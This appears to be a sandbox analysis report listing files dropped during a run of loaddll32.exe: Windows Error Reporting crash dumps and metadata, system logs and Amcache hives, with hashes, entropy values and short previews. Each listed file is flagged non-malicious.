                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_12d4f551\Report.wer
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.6786399792915607
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:ywFUAtZqyfy9hk1Dg3fWpXIQcQxc6VcEzcw3VR+a+z+HbHgkVG4rmMOyWZAXGngm:Xe8BfHPRZvjoq/u7sVS274ItW
                                                                                                            MD5:E042DAF2DC9C863DE6347875D5957573
                                                                                                            SHA1:AF0902501CD2A5179FBBD762FF0B061DD67D86F7
                                                                                                            SHA-256:2DDC12FFFF33ADD57AC88C378CF97F48B86C4A98E34B372CC0DB6CA12B9AA4A7
                                                                                                            SHA-512:2B2FF5E1718C8A833CC10DB2C0E94EAC6A816419CB9464AE02B9576607E5FA4E6E575F1384FDB24C21DC3264278CEEA4168CF73371E8E2C73AB131DFCE2747CF
                                                                                                            Malicious:false
                                                                                                             Preview: Version=1
                                                                                                                      EventType=APPCRASH
                                                                                                                      EventTime=132829401333014818
                                                                                                                      ReportType=2
                                                                                                                      Consent=1
                                                                                                                      UploadTime=132829401397077012
                                                                                                                      ReportStatus=524384
                                                                                                                      ReportIdentifier=318593c5-c95b-4efa-93da-9214e6c15b6e
                                                                                                                      IntegratorReportIdentifier=f748929f-a836-414f-94de-921da864ff75
                                                                                                                      Wow64Host=34404
                                                                                                                      Wow64Guest=332
                                                                                                                      NsAppName=loaddll32.exe
                                                                                                                      AppSessionGuid=00000a38-0001-0016-c11d-8eb0a2e7d701
                                                                                                                      TargetAppId=W:0000da39a3ee5e6b4b0d3255bfef95601890afd80709!0000da39a3ee5e6b4b0d3255bfef95601890afd80709!loaddll32.exe
                                                                                                                      TargetAppVe
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1060.tmp.csv
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):46004
                                                                                                            Entropy (8bit):3.065480441846344
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:4OHqvEKfy622Br2k8AqqnmZBrmNhlZI+r2nY12hA1E1bnSbBF:4OHofy622BrL8AqqnmZUZI+SnY12hAO4
                                                                                                            MD5:328665A094D81CC2FCB5A0F21A7A4A19
                                                                                                            SHA1:BAF52DBF1E60DB3F75422EB5FF91C58226726C72
                                                                                                            SHA-256:B588FDD79B06CF99BB0EF6650DF74AB75139E37C138C61E5CFD7C399A8715453
                                                                                                            SHA-512:E05096C9B361674B2EC50E0532C6F219A7AF333AFB9D41E0FAB42E980336AF89A24AC89C75DB01DA347C57CE066C9EB2FE34963FD05798C47A2DC7758C80306A
                                                                                                            Malicious:false
                                                                                                             Preview: ImageName,UniqueProcessId,NumberOfThreads,WorkingSetPrivateSize,HardFaultCount,NumberOfThreadsHighWatermark,CycleTime,CreateTime,UserTime,KernelTime,BasePriority,PeakVirtualSize,VirtualSize,PageFaultCount,WorkingSetSize,PeakWorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage,PrivatePageCount,ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,WriteTransferCount,OtherTransferCount,Han
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER13EB.tmp.txt
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):13340
                                                                                                            Entropy (8bit):2.6945194190417383
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:9GiZYWzBA/y4XvtYuY4WYHlYEZt9otCiB4ZLjCwqccaB3G1FVIFy3:9jZDzSZh9WH9aB3G1FqFy3
                                                                                                            MD5:74498F05CEDE84291AB14E0BEEE931EC
                                                                                                            SHA1:173685F447342F3CF74DF0517900C9FD57830437
                                                                                                            SHA-256:48F567AE55B235BB8828A703488B94D3BF1450AD46B06BD4B79C33FF8F83A978
                                                                                                            SHA-512:E993D3E75B7CD27F18C55F404DCD1A3E297F4EFCE52A47C1D43CA38B8B5784CEC24DEB8BFC8AEDECE5DEB64BF07C34AC47BEB3D6378D1A4FE12D6A61B7125329
                                                                                                            Malicious:false
                                                                                                             Preview: B   TimerResolution                 156250
                                                                                                                      B   PageSize                        4096
                                                                                                                      B   NumberOfPhysicalPages           1048315
                                                                                                                      B   LowestPhysicalPageNumber        1
                                                                                                                      B   HighestPhysicalPageNumber       1310719
                                                                                                                      B   AllocationGranularity           65536
                                                                                                                      B   MinimumUserModeAddress          65536
                                                                                                                      B   MaximumUserModeAddress          140737488289791
                                                                                                                      B   ActiveProcessorsAffinityMask
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAAC.tmp.dmp
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 17:35:22 2021, 0x1205a4 type
                                                                                                            Category:dropped
                                                                                                            Size (bytes):27136
                                                                                                            Entropy (8bit):2.52531299843665
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:RyWPVJcAOrud9+fPh3xrgl5c7EIWYvxDMhNn:nV+XrudYvgrc7zWa1ep
                                                                                                            MD5:38BDD294A991B5BDA3B88EB0AEF4E844
                                                                                                            SHA1:CCEE4A5D3C3A859529AB319CCFD5C9D5A28005FA
                                                                                                            SHA-256:3F1301C539E5E5B08400D0439CC0AF29E341E7B4878943EBAA11C6F2BFF24F1B
                                                                                                            SHA-512:7AC7BEEB443629B5B9736FFDE91A99A54DD7AB15CEB2B2527ABCC69832D5851273A5FB74A99FCAD31824B46C0349747AC248D198CA61FCA7C1359ED93D8B65C1
                                                                                                            Malicious:false
                                                                                                             Preview: MDMP header (binary minidump); readable strings in the preview: GenuineIntel, Pacific Standard Time, Pacific Daylight Time, 17134.1.x86fre.rs4_release.180410-1804
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFED.tmp.WERInternalMetadata.xml
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8340
                                                                                                            Entropy (8bit):3.6988695768145643
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:Rrl7r3GLNiRa6Xi6YIiSUaSgmfcSzTCpBb89b7ZsfmYvpm:RrlsNiM6y6YNSUaSgmfcSz17yfmT
                                                                                                            MD5:BE78AD3D99466DD597431BDFC39696CA
                                                                                                            SHA1:89CC1B5C0EE3D4E60D59A70DC93A1D52FC75CF68
                                                                                                            SHA-256:4FEAD19B1153997839CB05A5B0CC33EDB4153B65D7DFC1D6C7432BE4985FD181
                                                                                                            SHA-512:05F77F2DD49B1ED429FF905551DB310597CEAA553D8040F7D613E5503C9F0C96CD4811A4BBF266D6CF07141E33A055716CD1E7954FEC0827EEE9A05D54CCE0BA
                                                                                                            Malicious:false
                                                                                                             Preview: <?xml version="1.0" encoding="UTF-16"?>
                                                                                                                      <WERReportMetadata>
                                                                                                                       <OSVersionInformation>
                                                                                                                        <WindowsNTVersion>10.0</WindowsNTVersion>
                                                                                                                        <Build>17134</Build>
                                                                                                                        <Product>(0x30): Windows 10 Pro</Product>
                                                                                                                        <Edition>Professional</Edition>
                                                                                                                        <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>
                                                                                                                        <Revision>1</Revision>
                                                                                                                        <Flavor>Multiprocessor Free</Flavor>
                                                                                                                        <Architecture>X64</Architecture>
                                                                                                                        <LCID>1033</LCID>
                                                                                                                       </OSVersionInformation>
                                                                                                                       <ProcessInformation>
                                                                                                                        <Pid>2616</Pid>
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERB349.tmp.xml
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4598
                                                                                                            Entropy (8bit):4.471818356077874
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:cvIwSD8zs+JgtWI9TDWSC8Bfs8fm8M4J2ynZFUS+q84WDeKcQIcQwQed:uITf04ySNjJ1BYeKkwQed
                                                                                                            MD5:3FF9642F2B892DFF5D70F144E42459A3
                                                                                                            SHA1:030FF5B434093F22C44EAF6F0B7B3969C4E2D1F2
                                                                                                            SHA-256:CEDA14EB77F235A93E2923D9BFD5F7F17DB41B88E3B355A08A77C720CAC6A9E7
                                                                                                            SHA-512:864D41BA3EDD22B41870D97311589E22CCE2140632CAEDE9B746211DEE29B9B771973416C803CE7EF20590356ED00F883129F92B2ADB14BCC6EF328E90B3F0C7
                                                                                                            Malicious:false
                                                                                                             Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
                                                                                                                      <req ver="2">
                                                                                                                       <tlm>
                                                                                                                        <src>
                                                                                                                         <desc>
                                                                                                                          <mach>
                                                                                                                           <os>
                                                                                                                            <arg nm="vermaj" val="10" />
                                                                                                                            <arg nm="vermin" val="0" />
                                                                                                                            <arg nm="verbld" val="17134" />
                                                                                                                            <arg nm="vercsdbld" val="1" />
                                                                                                                            <arg nm="verqfe" val="1" />
                                                                                                                            <arg nm="csdbld" val="1" />
                                                                                                                            <arg nm="versp" val="0" />
                                                                                                                            <arg nm="arch" val="9" />
                                                                                                                            <arg nm="lcid" val="1033" />
                                                                                                                            <arg nm="geoid" val="244" />
                                                                                                                            <arg nm="sku" val="48" />
                                                                                                                            <arg nm="domain" val="0" />
                                                                                                                            <arg nm="prodsuite" val="256" />
                                                                                                                            <arg nm="ntprodtype" val="1" />
                                                                                                                            <arg nm="platid" val="2" />
                                                                                                                            <arg nm="tmsi" val="1280326" />
                                                                                                                            <arg nm="osinsty" val="1" />
                                                                                                                            <arg nm="iever" val="11.1.17134.0-11.0.47" />
                                                                                                                            <arg nm="portos" val="0" />
                                                                                                                            <arg nm="ram" val="4096" />
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERD66F.tmp.dmp
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 17:35:33 2021, 0x1205a4 type
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1060132
                                                                                                            Entropy (8bit):1.4694068307761825
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:xtDXsbhkymLmXp+84v4c+mWyVFZ5NH2tfB3hoBCs4Zn8xKKzfCVQ7hf:HLvymLmXEUIWTxZ8O2
                                                                                                            MD5:E3ECF4AB72BEC8ED688353E19C191F41
                                                                                                            SHA1:890523D48D2C970CC46C17F79BBD75108E6E94AB
                                                                                                            SHA-256:A0E30DBE92F994FFA1E585B18CF31418097ACCF8FDA52EA4FEE2FAD5CC426509
                                                                                                            SHA-512:26D821B57AEEDFF19CA3D4593C16F89EAD23490C7E27F63DF29B8A2FD11E558C431D5074DD9D98EF676DDFFECAFBA8346622D3DE289668D505CFE07227590EE8
                                                                                                            Malicious:false
                                                                                                             Preview: MDMP header (binary minidump); readable strings in the preview: GenuineIntel, Pacific Standard Time, Pacific Daylight Time, 17134.1.x86fre.rs4_release.180410-1804
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE40.tmp.WERInternalMetadata.xml
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8300
                                                                                                            Entropy (8bit):3.6934115243253127
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:Rrl7r3GLNiRzg6P6YITSU6KgmfL8GSoCpDv89bMZsfPPvEm:RrlsNi1g6P6YMSU6KgmfLrS4MyfPx
                                                                                                            MD5:0375ED25232FD5816BA1A6C32E4D8C30
                                                                                                            SHA1:74DCAB06EDBC31EC2FF5CF1C5E40BFA297FC79BD
                                                                                                            SHA-256:8AA8C30F217EE33F64B81940138E2F8AFC974B039814DBCAB48B133BD31E588F
                                                                                                            SHA-512:9581A738AE89CC5664DB43F00F1B3A52D804359B44F0F4F4CD1AA5D86247878B09F52C0421CC985E3274D42D29580FD5BDE3C7BFBB8B7C7936AFB315F828BF96
                                                                                                            Malicious:false
                                                                                                             Preview: <?xml version="1.0" encoding="UTF-16"?>
                                                                                                                      <WERReportMetadata>
                                                                                                                       <OSVersionInformation>
                                                                                                                        <WindowsNTVersion>10.0</WindowsNTVersion>
                                                                                                                        <Build>17134</Build>
                                                                                                                        <Product>(0x30): Windows 10 Pro</Product>
                                                                                                                        <Edition>Professional</Edition>
                                                                                                                        <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>
                                                                                                                        <Revision>1</Revision>
                                                                                                                        <Flavor>Multiprocessor Free</Flavor>
                                                                                                                        <Architecture>X64</Architecture>
                                                                                                                        <LCID>1033</LCID>
                                                                                                                       </OSVersionInformation>
                                                                                                                       <ProcessInformation>
                                                                                                                        <Pid>2616</Pid>
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE268.tmp.xml
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4558
                                                                                                            Entropy (8bit):4.429864115942591
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:cvIwSD8zs+JgtWI9TDWSC8Bp8fm8M4J2yGtFFe+q84tjCKcQIcQwQed:uITf04ySNEJE4xCKkwQed
                                                                                                            MD5:72F8264FEC96FC575B1B5E5B12A07146
                                                                                                            SHA1:9B28B40C85481FE154042C341898D2037E652C95
                                                                                                            SHA-256:7758F92C3E6DB4BA3B3109DFCF0D5AC6C665BCE73080C3D9909407BA08F38B00
                                                                                                            SHA-512:22F91988EC4CF796945B612ED67FBDD3B5B8CB008C8562274F7B65F852BC98653798F82AACE95A92B7BF7E6FD482C8AEBCB113E5724B76E4BBA42B1E5BCE4313
                                                                                                            Malicious:false
                                                                                                             Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
                                                                                                                      <req ver="2">
                                                                                                                       <tlm>
                                                                                                                        <src>
                                                                                                                         <desc>
                                                                                                                          <mach>
                                                                                                                           <os>
                                                                                                                            <arg nm="vermaj" val="10" />
                                                                                                                            <arg nm="vermin" val="0" />
                                                                                                                            <arg nm="verbld" val="17134" />
                                                                                                                            <arg nm="vercsdbld" val="1" />
                                                                                                                            <arg nm="verqfe" val="1" />
                                                                                                                            <arg nm="csdbld" val="1" />
                                                                                                                            <arg nm="versp" val="0" />
                                                                                                                            <arg nm="arch" val="9" />
                                                                                                                            <arg nm="lcid" val="1033" />
                                                                                                                            <arg nm="geoid" val="244" />
                                                                                                                            <arg nm="sku" val="48" />
                                                                                                                            <arg nm="domain" val="0" />
                                                                                                                            <arg nm="prodsuite" val="256" />
                                                                                                                            <arg nm="ntprodtype" val="1" />
                                                                                                                            <arg nm="platid" val="2" />
                                                                                                                            <arg nm="tmsi" val="1280326" />
                                                                                                                            <arg nm="osinsty" val="1" />
                                                                                                                            <arg nm="iever" val="11.1.17134.0-11.0.47" />
                                                                                                                            <arg nm="portos" val="0" />
                                                                                                                            <arg nm="ram" val="4096" />
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2A7.tmp.csv
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):46408
                                                                                                            Entropy (8bit):3.065873808938448
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:aNHLR3EFdibDx22KK2kSAKqnmZmrmNhFk/Sr25I+imqIkhGWrHYey:aNH2dibDx22KKLSAKqnmZ9k/SS5I+imZ
                                                                                                            MD5:194827815D8B2AC522E8BF66C2C6966D
                                                                                                            SHA1:385327742309D0D27C0AD42360C5F2F0A2D3B224
                                                                                                            SHA-256:A80AF9B8F112D9F55F0563750D03E758DA804B670949F8B339C6836D2442BCEC
                                                                                                            SHA-512:152EA9FD85743A7D06F5EA707E8DF001C1001463A546B46EC2240911E76A90B7602E360A5C106FD88F985253B4126F586E733965CB83C174B239BF4A884A291C
                                                                                                            Malicious:false
                                                                                                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE884.tmp.txt
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):13340
                                                                                                            Entropy (8bit):2.694315717418316
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:9GiZYW/LmqavzYnOYhWqHZYEZsvtCiEZCjqwfV8faueh+JXIsw3:9jZD/QoOJLGaueh+J4sw3
                                                                                                            MD5:0D5D9E8F0EA0D8556A705AC088B1691F
                                                                                                            SHA1:45426C44115F30140F0AF85952F2AF22AFB7B30A
                                                                                                            SHA-256:2DE70B0EBDA238AD81B22398D2FC4AB4BA4FBFBCFABCC3FCC006A23110C327E1
                                                                                                            SHA-512:FF40E9E20DA5A6914F418D80A1230BB8C87530AC36FA2677751E50C643AACA62B92A1CD62EE41BAC6BDF37F859AA5AE3E372CFFF1D347B9E6DD5C6E17D670C3C
                                                                                                            Malicious:false
                                                                                                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):55
                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                            Malicious:false
                                                                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):7250
                                                                                                            Entropy (8bit):3.16622869479047
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:cEj+AbCEH+AbuEAc+AbhGEA+AbNEe+Ab/Ee+AbPE6w9+Ab1wTEb+Ab+:cY+38+DJc+iGr+MZ+65+6tg+ECg+r
                                                                                                            MD5:F32E205765A5EA75A7D4D781ACDBB3BC
                                                                                                            SHA1:1E1FD988750282F2D43E60C6234EB28EBBCE7913
                                                                                                            SHA-256:41F7D2CC292C077B4C108D1AA90C43D33273512442B8AAE1BE659AC4D9876B15
                                                                                                            SHA-512:4D350AAB533FCFBC1DE80557A65772AEA14234E660A24C2A03BC85B0570DCB7AD25BB937964E57F6D260259FB5A250DEA7ED20543B3FEA58292FE9EFAB30C1C7
                                                                                                            Malicious:false
                                                                                                            Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                            C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211202_173411_162.etl
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):12288
                                                                                                            Entropy (8bit):3.8215928678402555
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:pC/SB2o+DK5Su92Z2YXmCCvI2l/Skq1P4zlT2VYFzgUMCM6JRol5PfbMCml5VbMJ:4/zAVOF2gzlnC/XChC0CYCRCP
                                                                                                            MD5:F56C797108F1B0EFC18279554D5F727A
                                                                                                            SHA1:EB91844C9E6B53833D7360602C1E98AABFA5763C
                                                                                                            SHA-256:97EAC58D628AAD2EAD17AC9BE3DC905F803A605283BD7178663C69AD75923D81
                                                                                                            SHA-512:3AA9BE47A75CC9627CB6CF40E84976890BA5F89DF01F7D3B6395AAC1C65D41DAFEC393DBBA8677A35E5F4D02DD3DC7744CEE785841417A2ED170C27EA1993134
                                                                                                            Malicious:false
                                                                                                            Preview: .... ... ....................................... ...!...............................0............................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... .......>............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.2.0.2._.1.7.3.4.1.1._.1.6.2...e.t.l.........P.P.....0...........................................................................................................................................................................................................................................................................
                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1572864
                                                                                                            Entropy (8bit):4.267634574274262
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:qkoswPRnkLvsEfv4lq5R4AdmVMSewOlmTQACI1bPdsd+bqLwSrD8Wu1R:xoswPRnkLvsEfv4En9CR
                                                                                                            MD5:ADD33C28B73DC52233D3FF5D95CA1612
                                                                                                            SHA1:BA83CA6BDC55A68281C5C06CBE878F6FA750CE8C
                                                                                                            SHA-256:A004D58EEAC43B48DAA62D17E345FB918FD27CF5EE0336B8BFB38BA4C3CA5342
                                                                                                            SHA-512:AD54436A5779336511D96480C92F86EC97CFBEDCAE690D1D11CA5A7B63472736143F39A79B92B126982F276D8DCF75B7978828E5F78B5D97F351CF813391DE39
                                                                                                            Malicious:false
                                                                                                            Preview: regfR...R...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmfo...................................................................................................................................................................................................................................................................................................................................................;..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16384
                                                                                                            Entropy (8bit):3.053139888950346
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:udXJb1ZymBsRFYv5FSE9lMqXyQVWnxuYW2odKqe8mxwp4uN5J:wZl5TXQnxuf2odPmxwp4uN5J
                                                                                                            MD5:77DEEDF0476D997DAF784E50870E7198
                                                                                                            SHA1:A3376EB61933CD8EF72FFD538C805C4B83FB0AC4
                                                                                                            SHA-256:706588ECDADB13CC58740EE6F11A7293EF7ECEA5E191529FF813E580CEBAC555
                                                                                                            SHA-512:D2937BF45BC24AE1A249B8D22C1275A5FC4BB70C9CAE1876F14A5937B91B06872684BD14B2CE78F34DF3A8148CCD319F9ABD39AE78317C6B2F4A25B9784F5EA8
                                                                                                            Malicious:false
